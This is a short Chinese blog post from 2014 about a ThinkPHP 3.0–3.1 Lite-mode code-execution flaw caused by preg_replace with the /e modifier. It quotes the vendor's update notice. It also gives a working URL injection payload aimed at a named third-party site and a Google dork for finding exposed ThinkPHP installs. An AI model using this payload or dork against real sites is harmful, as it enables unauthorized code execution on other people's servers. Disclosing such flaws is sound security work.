Thinkphp 3.0-3.1版代码执行漏洞

近日360库带计划中播报的ThinkPHP扩展类库的漏洞已经查明原因:系官方扩展模式中的Lite精简模式中存在可能的漏洞(原先核心更新安全的时候 并没有更新模式扩展部分,现已更新)。
对于使用标准模式或者其他模式的用户不存在此漏洞,敬请放心。3.2版本已经对扩展重新设计(原来的模式扩展、引擎扩展均不再支持),也不存在此问题。
请有使用ThinkPHP3.0~3.1版本的Lite模式的用户注意更新。
Lite模式扩展包下载地址:http://www.thinkphp.cn/extend/219.html

360库带计划:http://loudong.360.cn/vul/info/id/2919

th1
ThinkPHP 开启lite模式后,会加载ThinkPHP/Extend/Mode/Lite/Dispacher.class.php去匹配URL并分发用户请求, 而在该文件的65行使用perg_replace函数的 /e参数,
th2
第二个参数引用的时候使用了双引号,从而导致代码执行。

测试:http://www.rru-gz.com/index.php/Index/index/name/$%7B@phpinfo%28%29%7D

th3

 

 

Google语法:

inurl:index.php intext:ThinkPHP 2.1 { Fast & Simple OOP PHP Framework }  禁止用在非法用途

 

[via@0day5]

posted @ 2014-03-19 13:34  安全大可  阅读(7417)  评论(0编辑  收藏  举报
真正的安全感源自于自身的实力
回顶部